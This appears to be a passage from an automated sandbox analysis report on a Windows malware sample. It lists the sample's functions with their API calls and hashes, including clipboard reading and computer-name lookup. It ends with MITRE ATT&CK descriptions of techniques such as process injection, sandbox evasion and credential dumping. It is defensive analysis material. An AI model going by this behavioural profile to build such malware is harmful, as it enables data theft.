Part of subcall function 0040B7F0: FreeLibrary.KERNEL32 ref: 0040B817

ExitProcess.KERNEL32 ref: 00408BF9

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
String ID:
API String ID: 3072701918-0
Opcode ID: a7192d4bba584e2da569a0e6024164060574e560b558dc5113276dbe8eff527f
Instruction ID: 0331ca68987fcad23ec9f60d7dc389f7660080801ae230c1360257d89a0ff241
Opcode Fuzzy Hash: a7192d4bba584e2da569a0e6024164060574e560b558dc5113276dbe8eff527f
Instruction Fuzzy Hash: 32814976B483104FD30CAF69CD9236AB6D6ABC4314F1A853EA5C5EB3D1DA78CC018789

Function 00437449 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00437494
GetSystemMetrics.USER32 ref: 004374A3

Strings

, xrefs: 00437577

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 878fd7471b45aac4031499e666c7a3678ac5ade6a67959d4ef86b9c55e02ba72
Instruction ID: bd20265f2218acaa75f1a343e1f319d48abafd289e37d69d75bf7a5460cc67f4
Opcode Fuzzy Hash: 878fd7471b45aac4031499e666c7a3678ac5ade6a67959d4ef86b9c55e02ba72
Instruction Fuzzy Hash: CD51A0B4A192088FDB40EFACD981A9EBBF0BB48300F11452DE498E7350D734AD45CF96

Function 00424B80 Relevance: 5.0, APIs: 3, Instructions: 528COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,F0A7F298), ref: 00424C7F
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,F0A7F298,F0A7F298), ref: 00424CDB

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: effde289761ef5744e4d5d8f8480d3e783b0162be92d2ea30a30df434e2784a3
Instruction ID: 9a99b847402925b729af5f3ac080367e1e46b98c053836738ec3cc141a81792d
Opcode Fuzzy Hash: effde289761ef5744e4d5d8f8480d3e783b0162be92d2ea30a30df434e2784a3
Instruction Fuzzy Hash: 8C02FDB0A00350CFDB20CFA8D8817AABBB0FF46304F54856DD9869F392D7799806CB95

Function 0042ED27 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042EDBE

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 69ff788069373f7b58c29e16e47b303704b9c9a6e5a73f16ebf451203c1e24a3
Instruction ID: a15d6a2279cb8c821d382decf600d39f86d0206f3451072ea2026fa3d77c642d
Opcode Fuzzy Hash: 69ff788069373f7b58c29e16e47b303704b9c9a6e5a73f16ebf451203c1e24a3
Instruction Fuzzy Hash: 9C219A346146838BE7158F298420773FBF0EF63314F289689C0D29B392D728D986CBA4

Function 0042ED19 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042EDBE

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 85b1050cdd0431c80d85f451f06471773a399780dd492ac5f7a13f4adbbd4dfc
Instruction ID: 5d8715810dded4db41f6931390c326e4d2cdbde47bfc76660e6530c9459b1e97
Opcode Fuzzy Hash: 85b1050cdd0431c80d85f451f06471773a399780dd492ac5f7a13f4adbbd4dfc
Instruction Fuzzy Hash: 4A11A9706106428BE3118F29C820763FBF0FF56310F189688C0A29F382D738D886CB94

Function 00440FD0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00443F50,00000002,00000018,?,?,00000018,?,?,?), ref: 00440FFE

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 004418B4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00441922

Strings

B^&D, xrefs: 0044193E

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: ForegroundWindow
String ID: B^&D
API String ID: 2020703349-3289664189
Opcode ID: bcad641acd66edb98fcc93c2bbded2703f1809b638e502b96110f15229fd7013
Instruction ID: b319c3aa449bcc4fca0a3aa43656ebe4571c181139f1c04f3d60afba451f5296
Opcode Fuzzy Hash: bcad641acd66edb98fcc93c2bbded2703f1809b638e502b96110f15229fd7013
Instruction Fuzzy Hash: 54012677A410548BDB18CF31EC926AE7B62EB9A30CF1E847DC046BB391CA385842CF44

Function 0044114F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00441922

Strings

B^&D, xrefs: 0044193E

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: ForegroundWindow
String ID: B^&D
API String ID: 2020703349-3289664189
Opcode ID: 8d331b14063dad2f050785aa3397054c2e5552ede330e587bc1a1eac0c5e4be1
Instruction ID: 6ea57947840d9e20d7d8e968718340b61d2cb2866fcc37db5af5af79e7d604fc
Opcode Fuzzy Hash: 8d331b14063dad2f050785aa3397054c2e5552ede330e587bc1a1eac0c5e4be1
Instruction Fuzzy Hash: FFE08CB9901104DFD744CF54FC919A87370AB0E308B480439E103E3762EB30A942CF19

Function 0042EAD6 Relevance: 1.6, APIs: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042EB88

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 03949e2cbc301492b3520a597229dc53fa6894a85a67c625876d5481141595ad
Instruction ID: f27df93de72fb31abbe4af02cc59d81bbc37ffbede3cdab97f26119af15fa2e3
Opcode Fuzzy Hash: 03949e2cbc301492b3520a597229dc53fa6894a85a67c625876d5481141595ad
Instruction Fuzzy Hash: F7412475600B429FD3198F2AD9A0763FFA2FF86324F64861DD0A60B790C739B8168B54

Function 00440F60 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B7AA,?,00000001), ref: 00440F92

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0d31fa3472e34759b02e2e8fbe6bf13bf0df8286d41c1e8c09d8a36a26e12152
Instruction ID: af010370b183cadeb32bd15836267376cc3468b5c0cc5ebb318ec95fdda226fc
Opcode Fuzzy Hash: 0d31fa3472e34759b02e2e8fbe6bf13bf0df8286d41c1e8c09d8a36a26e12152
Instruction Fuzzy Hash: EEF02776819212EBD2102F29BC02A2B3664EF9B319F0A0437F40592121D73DD8278DAF

Function 00436210 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0043625A

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: a5bf1b672a05efa09a2c86111c41e62e831e596eb1b6fbf189608887b803caf2
Instruction ID: b252517de83ceac624f7c0e071c9548cba290ea8464a03e59b4d7304f9e2f959
Opcode Fuzzy Hash: a5bf1b672a05efa09a2c86111c41e62e831e596eb1b6fbf189608887b803caf2
Instruction Fuzzy Hash: E5F0A976A097028FE302CF29C95435BBBE6BFD8314F29C91CD49457354C7B5AA1A8BC1

Function 00432C95 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00432CDA

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: b9fcb0d767294f7933df303e3ac9b0110cdafa747512a87c8d7f0e0a870ce44b
Instruction ID: f680793aef265967b2fa0a354f54e017c9e3699f89e2af4f99de2473b6b540ab
Opcode Fuzzy Hash: b9fcb0d767294f7933df303e3ac9b0110cdafa747512a87c8d7f0e0a870ce44b
Instruction Fuzzy Hash: 08F022B46087019FE350DF69D5A871BBBE0EF85304F11891CE4958B290D7B699598F82

Function 0043A2AF Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 0043A2CA

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 5170f53937f96ec0c4926522ee47619496d991a05ef43ac9b8da2224485bb255
Instruction ID: c671a93c5dd4f745dfd31b73a5279d760a0703b2793832f5acac045d63216389
Opcode Fuzzy Hash: 5170f53937f96ec0c4926522ee47619496d991a05ef43ac9b8da2224485bb255
Instruction Fuzzy Hash: AAE086B4A055009FD744EF6CD99195977F0EF4E304F01009DE446E7320DE706940CF16

Function 0040CFE3 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CFF5

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 4298e9e227d8a23d1701670bd1e2ad44f14aab270d921fa508460c2436bafc75
Instruction ID: adf311785b07bfeeebd3f6c3cd0acc2bcd7332936d609f4f4ec8ed4e6d12800d
Opcode Fuzzy Hash: 4298e9e227d8a23d1701670bd1e2ad44f14aab270d921fa508460c2436bafc75
Instruction Fuzzy Hash: 6ED092343C9341BAE1659748AC53F2826559703B25F300228B362EE2E1CAD07505C61C

Function 0040CFB0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CFC3

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 6b0443d878ba74360a6ec81a0a961cc42cf383deae663a8d56c5b9696fc023aa
Instruction ID: 186c5c5eab5fce1021e087edd1738111e0ba74e1e51d5c1cc26df77cc250cb70
Opcode Fuzzy Hash: 6b0443d878ba74360a6ec81a0a961cc42cf383deae663a8d56c5b9696fc023aa
Instruction Fuzzy Hash: FAD05E352641446BD214A758EC0BF1A3A188343755F00022DA762DA2D2DAA06811C66E

Function 0043F430 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,00440FB6,?,0040B7AA,?,00000001), ref: 0043F44E

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: b87f099d2f1a1488592db62ed771c7912514c19a142b446e4b1b2f0c62776d28
Instruction ID: 2f4f0eaace81593f79610c37ecd312a3b4125d07944818fdd62fcc626c74d15d
Opcode Fuzzy Hash: b87f099d2f1a1488592db62ed771c7912514c19a142b446e4b1b2f0c62776d28
Instruction Fuzzy Hash: 96D01231456632EBD6101F24FC06B963A65EF06361F4748A1B404AB075D664EC5086D8

Function 0043F40B Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 0043F411

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 61cffe666dd2f20766e020ca81239bc9b0c57160164f667c0b5ca6ed82b3addc
Instruction ID: a7c1d6df479e3b6d716dfc8d5480205a20d5923fc4776c6c1b984fc515f30490
Opcode Fuzzy Hash: 61cffe666dd2f20766e020ca81239bc9b0c57160164f667c0b5ca6ed82b3addc
Instruction Fuzzy Hash: BFA01132080220BACA202B00BC08FC23E22EB00222F2200A0B0000A0BA8A208882CA88

Non-executed Functions

Function 00436C60 Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 110clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00436C74
GetClipboardData.USER32 ref: 00436C8F
GlobalLock.KERNEL32 ref: 00436CAE
GetWindowLongW.USER32 ref: 00436D0D
GlobalUnlock.KERNEL32 ref: 00436DC9
CloseClipboard.USER32 ref: 00436DD4

Strings

2, xrefs: 00436D50
Y, xrefs: 00436D5F
#, xrefs: 00436D3C
,, xrefs: 00436D5A
1, xrefs: 00436D41
, xrefs: 00436D46
1, xrefs: 00436D23
>, xrefs: 00436D37
7, xrefs: 00436D28
{, xrefs: 00436D4B
", xrefs: 00436D32
?, xrefs: 00436D2D

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: $"$#$,$1$1$2$7$>$?$Y${
API String ID: 2832541153-1953324825
Opcode ID: d259c30308c7886e93cfa2317cbeb8f3fe84331dfc574816643ea7635fabab03
Instruction ID: 60c511607aeb70751f28773193d70249728fe70423b9e5edba57af8e89cd8135
Opcode Fuzzy Hash: d259c30308c7886e93cfa2317cbeb8f3fe84331dfc574816643ea7635fabab03
Instruction Fuzzy Hash: AD413A7050C3919ED301AF78D58835EBFE0AF96308F455C2EE4C58A282D6BD854EC7A7

Function 004251F0 Relevance: 16.1, APIs: 3, Strings: 6, Instructions: 302COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 00425329

Strings

`y, xrefs: 00425440
Cab#, xrefs: 004252FB, 004252A0
k}, xrefs: 00425450
uz, xrefs: 00425448
;8, xrefs: 00425276
Cab#, xrefs: 004253A1

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: ;8$Cab#$Cab#$`y$k}$uz
API String ID: 237503144-1056469042
Opcode ID: 42c7bc7f8fbe24742828914a79296a9e21ca8ed8d1d3f0475eded48e8727a20c
Instruction ID: bcc02824e3947a1ea90b742ca337082d8bfa64ea08ff0336714ae7172eba71be
Opcode Fuzzy Hash: 42c7bc7f8fbe24742828914a79296a9e21ca8ed8d1d3f0475eded48e8727a20c
Instruction Fuzzy Hash: 8DB103726083419FD324CF25DC4079FBBE5FBC5308F148A2DE5999B290DBB999098B87

Function 0042B153 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042AFC9
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042B10C

Strings

)MO, xrefs: 0042B05C

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: )MO
API String ID: 237503144-3323202834
Opcode ID: cef1ef94db3ff83ea65b91f9ad74883aad7080e1d57d4beacceeb3e55b02cdd0
Instruction ID: 7aa6ba94c543c7117c8f35386812ef2526557695ae3239063d99babfd4844270
Opcode Fuzzy Hash: cef1ef94db3ff83ea65b91f9ad74883aad7080e1d57d4beacceeb3e55b02cdd0
Instruction Fuzzy Hash: 7B610EB09103609FEB11CF69E882B5A7FB1FB42310F16819DE855AF39AD774C442CB85

Function 00429CE2 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 207COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 00429D09

Strings

no, xrefs: 00429EDC
{u, xrefs: 00429EC0

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: no${u
API String ID: 237503144-55960692
Opcode ID: dfbc1115f0e4b8e03845353b38ef56d6f725bb4744a5fe6e62312832bc81a02e
Instruction ID: 5c0636d0a4c6a702dbacf3c8514e7b7bc2b2621f5c15dbef5acc8f82090420ce
Opcode Fuzzy Hash: dfbc1115f0e4b8e03845353b38ef56d6f725bb4744a5fe6e62312832bc81a02e
Instruction Fuzzy Hash: 3671CE7260C3518FE318CF69E89175FB7F2EBC5304F05893DE5958B281DB78850A8B86

Function 00437A25 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00437A56
GetSystemMetrics.USER32 ref: 00437A65

Strings

, xrefs: 00437B13

Memory Dump Source

Source File: 00000001.00000002.2927537546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2927537546.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_download.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 2d90ca514ab1c60a5a45ad777a070ac093e011206b21008aaf7e54a9ec8eb3ea
Instruction ID: e454c19dd3f9858d3e36b13bde97205be948d7206bab087054c9f66857642ea3
Opcode Fuzzy Hash: 2d90ca514ab1c60a5a45ad777a070ac093e011206b21008aaf7e54a9ec8eb3ea
Instruction Fuzzy Hash: 2331A1B49193148FDB00EF78D98561EBBF4BB89304F01496EE498DB361D370A949CF86

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

